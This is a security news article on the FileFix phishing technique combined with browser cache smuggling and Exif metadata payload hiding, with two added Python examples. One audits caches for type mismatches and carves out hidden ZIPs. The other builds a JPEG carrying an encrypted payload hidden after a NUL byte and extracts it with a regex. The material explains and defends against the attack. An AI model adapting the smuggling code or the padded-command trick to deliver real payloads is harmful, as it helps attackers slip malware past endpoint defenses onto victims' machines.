Cybersecurity researchers have uncovered a sophisticated evolution of the FileFix phishing technique that combines it with cache smuggling to bypass modern security defenses.
In this hybrid, the second-stage loader never has to make a web request of its own: the payload is pulled from the browser's cache, where it was planted earlier through cache smuggling.
That is a meaningful shift in tactics, because many security controls are built around watching and restricting untrusted code's ability to reach the internet.
The attack builds upon the established ClickFix methodology, where threat actors create fake CAPTCHA prompts that social engineer victims into executing malicious commands.

These phishing lures typically instruct users to press Windows key + R to open the Run dialog, followed by Ctrl + V to paste clipboard content, and Enter to execute.
Behind the scenes, JavaScript on the malicious webpage has already populated the victim’s clipboard with harmful commands.
However, the Run dialog accepts only 260 characters, which severely limits the complexity of the command and pushes adversaries toward easily detected PowerShell or MSHTA one-line downloaders.
FileFix works around this limit by having victims paste into the Windows Explorer address bar instead, which accepts up to 2,048 characters.
The extra room lets threat actors place the real command first, pad it with a long run of spaces, and end with a benign-looking file path, so that only the path is visible to the user after pasting.
A recently observed campaign masqueraded as a FortiClient Compliance Checker, leveraging JavaScript to automatically open Windows Explorer and guide victims through the attack sequence.
Weaponizing Browser Functionality
The critical innovation in this attack merges FileFix with cache smuggling, a technique that abuses how web browsers store static assets such as CSS, JavaScript, and image files on disk.
As the researcher behind the proof-of-concept puts it: "To demonstrate this, I put together a basic proof-of-concept phishing page which conceals a 'Hello World' DLL inside the Exif data of the page logo."
The server sets a misleading HTTP Content-Type header, such as image/jpeg, on a file that is really something else, so the browser treats the response as a cacheable image and writes it to disk; the bytes themselves can be anything, including an archive or an executable.
In the FortiClient campaign, malicious JavaScript called fetch() on a file served as a JPEG that was in fact a ZIP archive containing the malware, so the request looked like an ordinary image load.
The PowerShell stage then searches the browser's cache directory for that ZIP, carves it out, and executes its contents, without opening a single network connection that endpoint detection and response tooling or a firewall would flag.
This sidesteps security layers whose job is to spot and block suspicious outbound connections from untrusted scripts.
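To make the Content-Type mismatch concrete, here is an added Python example written for this page (it is not code from the campaign or from the researchers). It audits a directory of cached response bodies: it sniffs each file's magic bytes, compares them with the type the server declared, and carves out any ZIP it finds, which is both what the loader does and the check a responder can run over a suspect cache. It assumes a simplified layout in which each cache file holds the raw HTTP body and the declared Content-Types are supplied separately; real Chromium cache entries wrap the body in their own framing and store the response headers elsewhere, which is why the carver searches for the ZIP signature instead of trusting offset 0. The sample files, their names and the stage2.ps1 member are constructed for the demo.

```python
"""Audit cached response bodies for a Content-Type / magic-byte mismatch,
e.g. a ZIP archive that a server labelled image/jpeg so the browser cached it."""
import io
import os
import tempfile
import zipfile

# Leading bytes of common types. A browser caches the body whatever it is;
# only the declared type decides how the response is treated.
MAGICS = [
    (b"\xff\xd8\xff", "image/jpeg"),
    (b"\x89PNG\r\n\x1a\n", "image/png"),
    (b"GIF87a", "image/gif"),
    (b"GIF89a", "image/gif"),
    (b"PK\x03\x04", "application/zip"),
    (b"MZ", "application/x-msdownload"),
]


def sniff(data: bytes) -> str:
    """MIME type implied by the first bytes, or 'unknown'."""
    for magic, mime in MAGICS:
        if data.startswith(magic):
            return mime
    return "unknown"


def carve_zip(data: bytes):
    """Names inside the first parseable ZIP found anywhere in data, else None.
    Scans for the local-file-header signature rather than trusting offset 0,
    because a real cache entry may carry framing before the HTTP body."""
    off = data.find(b"PK\x03\x04")
    while off != -1:
        try:
            with zipfile.ZipFile(io.BytesIO(data[off:])) as zf:
                return zf.namelist()
        except zipfile.BadZipFile:
            off = data.find(b"PK\x03\x04", off + 1)
    return None


def audit_cache(cache_dir: str, declared: dict) -> list:
    """declared maps cache file name -> Content-Type the server sent
    (assumption: in practice this comes from the cache's stored response headers).
    Returns (name, declared, sniffed, zip_members) for every mismatch."""
    findings = []
    for name, claimed in declared.items():
        with open(os.path.join(cache_dir, name), "rb") as fh:
            body = fh.read()
        actual = sniff(body)
        if actual != claimed:
            findings.append((name, claimed, actual, carve_zip(body)))
    return findings


def build_demo(cache_dir: str) -> dict:
    """Constructed sample cache: one genuine (header-only) JPEG and one ZIP
    that was served with Content-Type: image/jpeg."""
    os.makedirs(cache_dir, exist_ok=True)
    real_jpeg = (b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01"
                 b"\x00\x00\xff\xd9")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("stage2.ps1", "Write-Host 'constructed stand-in, not a real stage'")
    with open(os.path.join(cache_dir, "logo_f3a1"), "wb") as fh:
        fh.write(real_jpeg)
    with open(os.path.join(cache_dir, "banner_77c0"), "wb") as fh:
        fh.write(buf.getvalue())
    return {"logo_f3a1": "image/jpeg", "banner_77c0": "image/jpeg"}


def demo() -> list:
    """Build the sample cache in a temp dir and audit it."""
    cache_dir = tempfile.mkdtemp(prefix="cache_audit_")
    return audit_cache(cache_dir, build_demo(cache_dir))


if __name__ == "__main__":
    for name, claimed, actual, members in demo():
        print("%s: declared %s but bytes say %s; zip members: %s"
              % (name, claimed, actual, members))
```

The same sniff-versus-declared comparison is worth applying to any other on-disk cache an untrusted script might read (mail clients included), since the mismatch is the one property the attacker cannot remove while still getting the browser to store the file.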
Researchers have developed an even more sophisticated variant that smuggles the payload in the Exif metadata of a JPEG image.
In a JPEG, Exif data lives in an APP1 segment whose length field caps it at roughly 64 KB, and a single field can occupy nearly all of that space.
Most Exif parsers treat ASCII fields as NUL-terminated strings, so a benign string followed by a null byte is all they display, even though the field's declared length runs well past the null. Attackers exploit this to hide a payload inside a standard field such as "Image Description" while the image remains valid and the payload stays out of sight of most tools.
The payload is encrypted and placed between delimiter tags inside the Exif data, so a PowerShell script can pull it out with a regular expression over the file's bytes and never needs a full Exif parser.
The result is a legitimate JPEG that displays normally and passes a cursory inspection while carrying the second stage. Because the payload is never written to disk in decrypted form until the loader decrypts it, on-access antivirus scans are much less likely to catch it.
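The following Python example is added here and is not taken from the research or the campaign. It builds the Exif trick end to end: it writes a minimal TIFF/IFD0 into a JPEG APP1 segment with an ImageDescription made of benign text, a null byte, and then a delimited base64 payload; it shows what a NUL-terminated reader sees versus what a regex over the raw file recovers; and it includes the check a defender wants, namely a declared field length that runs past the first NUL. The delimiters <<S>> and <<E>>, the XOR stand-in for the campaign's (unspecified) encryption, the key, and the header-only JPEG stub are all assumptions made for the demo.

```python
"""Exif ImageDescription smuggling: benign text, a NUL, then a tagged payload
in one ASCII field, plus the regex extraction and a defender-side check."""
import base64
import re
import struct

TAG_IMAGE_DESCRIPTION = 0x010E
TYPE_ASCII = 2
START, END = b"<<S>>", b"<<E>>"  # assumed delimiters; the campaign's are not given


def xor(data: bytes, key: bytes) -> bytes:
    """Toy stand-in for whatever cipher the real campaign used."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def build_app1(description: bytes) -> bytes:
    """Minimal little-endian TIFF with one IFD0 entry, wrapped in a JPEG APP1."""
    value = description + b"\x00"             # Exif ASCII values end in NUL
    entry_count = 1
    data_off = 8 + 2 + 12 * entry_count + 4    # header, count, entries, next-IFD ptr
    tiff = b"II*\x00" + struct.pack("<I", 8)
    tiff += struct.pack("<H", entry_count)
    tiff += struct.pack("<HHII", TAG_IMAGE_DESCRIPTION, TYPE_ASCII, len(value), data_off)
    tiff += struct.pack("<I", 0) + value
    body = b"Exif\x00\x00" + tiff
    if len(body) + 2 > 0xFFFF:                 # 16-bit segment length: the 64 KB cap
        raise ValueError("APP1 segment (and so the Exif block) is capped at 64 KB")
    return b"\xff\xe1" + struct.pack(">H", len(body) + 2) + body


def smuggle(jpeg: bytes, visible: bytes, payload: bytes, key: bytes) -> bytes:
    """Insert the APP1 right after the SOI marker of an existing JPEG."""
    if jpeg[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG")
    hidden = START + base64.b64encode(xor(payload, key)) + END
    return jpeg[:2] + build_app1(visible + b"\x00" + hidden) + jpeg[2:]


def read_description(jpeg: bytes) -> bytes:
    """Tiny IFD0 walker: the full ImageDescription bytes (final NUL removed)."""
    i = jpeg.find(b"Exif\x00\x00")
    if i == -1:
        return b""
    t = i + 6                                  # start of the TIFF header
    bo = "<" if jpeg[t:t + 2] == b"II" else ">"
    ifd = t + struct.unpack(bo + "I", jpeg[t + 4:t + 8])[0]
    n = struct.unpack(bo + "H", jpeg[ifd:ifd + 2])[0]
    for k in range(n):
        e = ifd + 2 + 12 * k
        tag, typ, cnt, off = struct.unpack(bo + "HHII", jpeg[e:e + 12])
        if tag == TAG_IMAGE_DESCRIPTION and typ == TYPE_ASCII:
            raw = jpeg[e + 8:e + 12] if cnt <= 4 else jpeg[t + off:t + off + cnt]
            return raw[:cnt].rstrip(b"\x00")
    return b""


def visible_description(jpeg: bytes) -> str:
    """What a NUL-terminated-string reader (most Exif tools) shows."""
    return read_description(jpeg).split(b"\x00", 1)[0].decode("ascii", "replace")


def hides_data_after_nul(jpeg: bytes) -> bool:
    """Defender's check: the declared field length runs past the first NUL."""
    parts = read_description(jpeg).split(b"\x00", 1)
    return len(parts) == 2 and len(parts[1]) > 0


def extract_payload(jpeg: bytes, key: bytes) -> bytes:
    """Loader side: no Exif parser at all, just a regex over the whole file."""
    m = re.search(re.escape(START) + rb"([A-Za-z0-9+/=]+)" + re.escape(END), jpeg)
    return xor(base64.b64decode(m.group(1)), key) if m else b""


# Constructed stand-in for a real JPEG: SOI, a JFIF APP0, EOI (no scan data).
STUB_JPEG = (b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01"
             b"\x00\x00\xff\xd9")

if __name__ == "__main__":
    key = b"example-key"
    img = smuggle(STUB_JPEG, b"Company logo", b"Hello World", key)
    print("tool shows:", visible_description(img))
    print("hidden bytes after NUL:", hides_data_after_nul(img))
    print("loader recovers:", extract_payload(img, key))
```

For a real image, pass its bytes instead of STUB_JPEG; the APP1 goes in immediately after SOI and the scan data is untouched, which is why the picture still renders. The hides_data_after_nul check is cheap enough to run over every image in a mail or browser cache and has no reason to fire on a normally written file.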
Security Implications
The Exif smuggling technique extends beyond web browsers to email clients. Testing revealed that Microsoft Outlook downloads and caches image attachments ahead of time even when image previewing is disabled, and, crucially, does not strip Exif metadata from them.
This means an attacker can land a second-stage payload on a target system simply by sending an email with a specially crafted JPEG attachment, potentially without the victim ever opening the message.
This development challenges fundamental assumptions in security monitoring. Traditional defenses rely on detecting malicious scripts either embedding payloads directly or performing web requests to fetch them.
When payloads are pre-smuggled through legitimate caching mechanisms, these controls become ineffective.
The technique also enables the creation of command-and-control-less loaders that monitor software cache directories for files containing predetermined signatures, eliminating network indicators of compromise entirely.
Security vendors must adapt their detection strategies to account for scenarios where second-stage payloads arrive through passive caching mechanisms rather than active downloads.
Organizations should consider implementing controls that strip metadata from cached files, monitor for unusual access patterns to browser cache directories, and deploy behavioral analytics that can identify suspicious script activity even in the absence of network connections.
As threat actors continue innovating around established security controls, defenders must expand their visibility beyond traditional network-based indicators to maintain effective protection.